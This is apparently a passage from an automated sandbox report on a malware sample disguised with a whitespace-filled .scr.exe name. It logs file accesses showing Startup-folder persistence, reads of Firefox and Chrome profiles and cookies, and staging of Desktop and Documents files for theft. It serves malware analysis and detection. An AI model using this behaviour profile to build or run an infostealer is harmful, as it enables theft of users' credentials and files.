Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\unicodedata.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \System\Antivirus.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \System\System Info.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\BJZFPPWAPT.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\DUUDTUBZFW.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EIVQSAOTAQ.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EOWRVPQCCS.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EOWRVPQCCS.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\GIGIYTFFYT.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\GIGIYTFFYT.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\GIGIYTFFYT.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\GIGIYTFFYT.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\QCOILOQIKC.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\QCOILOQIKC.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\QCOILOQIKC.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\QCOILOQIKC.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\QCOILOQIKC.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\TQDFJHPUIU.png VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\TQDFJHPUIU.png VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\ZGGKNSUKOP.png VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\BJZFPPWAPT.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\DUUDTUBZFW.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\EIVQSAOTAQ.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\EOWRVPQCCS.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\EOWRVPQCCS.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\GIGIYTFFYT.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\GIGIYTFFYT.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\GIGIYTFFYT.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\PALRGUCVEH.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\PALRGUCVEH.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\PALRGUCVEH.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\PALRGUCVEH.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\PALRGUCVEH.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\PALRGUCVEH.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\PALRGUCVEH.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\QCOILOQIKC.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\TQDFJHPUIU.png VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\TQDFJHPUIU.png VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\TQDFJHPUIU.png VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\TQDFJHPUIU.png VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\ZGGKNSUKOP.png VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\ZGGKNSUKOP.png VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\ZGGKNSUKOP.png VolumeInformation Jump to behavior
